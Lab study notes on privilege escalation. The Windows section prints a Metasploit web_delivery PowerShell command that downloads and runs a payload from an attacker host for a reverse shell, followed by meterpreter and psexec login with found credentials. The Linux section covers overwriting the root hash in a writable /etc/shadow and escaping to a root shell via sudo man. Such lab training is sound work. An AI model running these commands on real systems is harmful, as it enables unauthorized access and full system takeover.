# 4 - Privilege Escalation ## sds
Windowsmicrosoft_windows_10x_logo_blue_spotlight_background_by_atakan_gettyimages-872430032_2400x1600-100882264-large.webp
LinuxLinux-scaled.jpg#linux
## Windows In order to elevate your privileges on Windows, you must first, **identify** privilege escalation vulnerabilities that exist on the target system. This process will differ greatly based on the type of target you gain access to. Privilege escalation on Windows can be performed through a plethora of techniques based on the * **version** of Windows * **system**’s unique **configuration**. This process can be quite tedious and time consuming and as a result, it is recommended to automate the processes of identifying privilege escalation vulnerabilities. This can be done through the use of various automation scripts like **PrivescCheck**. **PrivescCheck** - This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation. The script needs to be executed on the target machine. {% embed url="" %} ### 🔬Windows: PrivescCheck In this lab you are also provided with access to a victim' session via GUI. **Exploit the target** Since the target system doesn't have vulnerable services and we can directly interact with the target system, we can exploit the latter with the module ``` exploit/multi/script/web_delivery ``` which will start a web server (on LHOST) hosting a malicious payload. Running the exploit will generate a Powershell command that, executed on the target system, will download the payload from the said web server and then executed, providing you with a session on the target machine. Set:
VariableValue
targetPSH\ (Binary)
payloadwindows/shell/reverse_tcp
PSH-EncodedCommandfalse
LHOSTeth1
Run the script, copy the Powershell command it generates and run in over to the target machine: on your msfconsole you should get a shell (nonn-interactive). ``` msf5 exploit(multi/script/web_delivery) > [*] Local IP: http://10.10.24.6:8080/RtZZRZ [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$z="echo ($env:temp+'\ZxC0TeX3.exe')"; (new-object System.Net.WebClient).DownloadFile('http://10.10.24.6:8080/RtZZRZ', $z); invoke-item $z [*] 10.2.30.5 web_delivery - Delivering Payload (73802 bytes) [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.2.30.5 [*] Command shell session 1 opened (10.10.24.6:4444 -> 10.2.30.5:49762) at 2023-07-10 20:43:13 +0530 ``` **Upgrade the shell** Put the shell in background and use the module ``` post/multi/manage/shell_to_meterpreter ``` to upgrade the shell to a meterpreter session, setting
VariableValue
LHOSTeth1
SESSION1
WIN_TRANSFERVBS
**Run PrivescCheck** After obtaining the meterpreter session, migrate to `explorer.exe` to have a more stable session, then navigate to `C:\Users\student\Desktop\PrivescCheck` and switch from meterpreter to "shell mode". Then run the ps1 script following the instructions on the repository page, in our case ```bash powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" ``` and let it run. You will find a pair of credentials *adminstrator/hello\_123321*. **Login to the target system and find tha flag** We can login to the target system via PsExec using * python script (`psexec.py`) * metasploit module {% tabs %} {% tab title="Python script" %} ```bash psexec.py administrator@ ``` You can then find the flag with the command ``` dir /s /b flag.txt ``` This command will search for the file "flag.txt" in the current directory and all subdirectories (`/s` option). The `/b` option is used to display only the file names without additional information. If the file is found, the command prompt will display the full path to the file. If the file is not found, there will be no output. {% endtab %} {% tab title="Metasploit exploit" %} ``` use exploit/windows/smb/psexec ``` Set: | Variable | Value | | ------------- | ------------------------------------------------------------------------ | | LPORT | just make sure it's different from the ones in the other active sessions | | RHOSTS | target IP | | SMBUser | administrator | | SMBPass | hello\_123321 | | {% endtab %} | | | {% endtabs %} | | ## Linux To identify Linux vulnerabilities you can use [**LinEnum**](https://github.com/rebootuser/LinEnum). Checks to do first: 1. identify yourself (`whoami`) 2. `cat /etc/passwd` to find out other user account 3. list all groups your user belongs to (`groups`) 4. list all groups in the system (`cat /etc/group`) ### Files with weak permissions The goal here is to identify those files that should have root permissions (r+w) but that are instead misconfigured, allowing reading and/or writing to *non-root* users. To find these files, run the command ```bash find / -not -type l -perm -o+w 2>/dev/null ``` * `find`: It is the command used to search for files and directories within a given directory hierarchy. * `/`: It specifies the starting point for the search. In this case, it is the root directory, indicating that the search will cover the entire file system. * `-not`: It is a logical operator that negates the expression that follows it. * `-type l`: This specifies the type of file to search for. In this case, it looks for symbolic links. * `-perm -o+w`: This expression specifies the permissions of the files to search for. It searches for files that have write permission for others (users who are not the owner or in the same group). * `2>/dev/null`: discard result lines with errors Putting it all together, the command `find / -not -type l -perm -o+w` searches for files within the entire file system, excluding symbolic links, that have write permission for others. #### *Example* From the results of the previous command, we found that `/etc/shadow` was misconfigured: it means we can change the password of the root user. To generate a new password (in our case *password*), use the command ```bash openssl passwd -1 -salt abc password ``` * `openssl`: It is a command-line tool used for various cryptographic operations and handling SSL/TLS protocols. * `passwd`: It is a subcommand of OpenSSL used for generating password hashes. * `-1`: This option specifies the algorithm to use for password hashing. In this case, `-1` indicates the MD5-based algorithm (the weakest one). * `-salt abc`: This option sets the salt value to be used in the password hashing process. The salt is a random value that adds complexity to the password hash. * `password`: This is the password for which the hash will be generated. In summary, the command `openssl passwd -1 -salt abc password` generates an MD5-based password hash for the password "password" using the salt value "abc." Now copy the generated hash and paste it in place of the \* after `root:` ``` student@attackdefense:~$ cat /etc/shadow root:*:17764:0:99999:7::: daemon:*:17764:0:99999:7::: ``` Switch to the *root* user with the `su` command and that's it! ### **Misconfigured SUDO privileges** Check what commands the current user can execute with SUDO privileges: ```bash sudo -l ``` ``` student@attackdefense:~$ sudo -l Matching Defaults entries for student on attackdefense: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User student may run the following commands on attackdefense: (root) NOPASSWD: /usr/bin/man ``` In this example, the user student can run the `man` command with SUDO privileges without entering the *root* password. As you can see from here, you can spawn a shell within man: doing it as you were root, will start a privileged shell! ```bash man !/bin/bash ``` An excellent resource to find out privesc vectors on binaries is [**GTFOBins**](https://gtfobins.github.io/)**.**